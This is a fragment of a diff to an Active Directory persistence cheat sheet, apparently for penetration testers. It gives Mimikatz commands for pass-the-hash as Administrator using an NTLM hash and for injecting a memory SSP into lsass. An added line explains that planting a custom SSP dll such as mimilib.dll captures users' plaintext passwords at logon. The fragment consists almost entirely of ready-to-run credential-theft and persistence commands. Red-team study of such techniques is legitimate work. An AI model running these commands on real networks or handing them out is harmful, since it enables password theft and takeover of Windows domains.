galminyana/CheatSheets/AD/AD_Persistence.md

 C:> Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<domain> /user:Administrator /ntlm:<adim_hash> /run:powershell.exe
 ```
 ### SSP (Security Support Provider)
+We can set our on SSP by dropping a custom dll, for example mimilib.dll from mimikatz, that will monitor and capture plaintext passwords from users that logged on!
 - Inject into `lsass` using Mimikatz
 ```powershell
 C:> Invoke-Mimikatz -Command '"misc::memssp"'